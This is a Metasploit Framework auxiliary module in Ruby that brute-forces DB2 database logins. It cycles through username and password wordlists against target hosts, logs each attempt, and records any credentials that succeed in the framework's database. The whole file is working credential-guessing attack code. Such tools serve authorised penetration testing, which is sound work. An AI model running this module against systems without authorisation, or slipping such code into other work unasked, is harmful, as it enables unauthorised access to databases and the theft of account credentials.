## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', 'Version' => '$Revision$', 'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.}, 'Author' => ['todb'], 'License' => MSF_LICENSE ) register_options( [ OptBool.new('VERBOSE', [ true, 'Verbose output', false]), OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) # Users must use user/pass/userpass files. deregister_options('USERNAME' , 'PASSWORD') end def run_host(ip) each_user_pass { |user, pass| userpass_sleep_interval unless self.credentials_tried.empty? this_cred = [user,ip,rport].join(":") next if self.credentials_tried[this_cred] == pass || self.credentials_good[this_cred] do_login(user,pass,this_cred,datastore['DATABASE']) self.credentials_tried[this_cred] = pass } end def do_login(user=nil,pass=nil,this_cred=nil,db=nil) verbose = datastore['VERBOSE'] datastore['USERNAME'] = user datastore['PASSWORD'] = pass print_status("Trying username:'#{user}' with password:'#{pass}' against #{rhost}:#{rport}") if verbose begin info = db2_check_login rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} : Unable to attempt authentication") if verbose return :done rescue ::Rex::Proto::DRDA::RespError => e print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose return :error end disconnect # Report service state report_service( :host => rhost, :port => rport, :name => "db2" ) if info[:db_login_success] print_good("#{rhost}:#{rport} DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") self.credentials_good[this_cred] = pass # Report credentials report_auth_info( :host => rhost, :proto => 'db2', :user => user, :pass => pass, :database => db, :targ_host => rhost, :targ_port => rport ) return :next_user else print_status("#{rhost}:#{rport} DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") if verbose return :fail end end end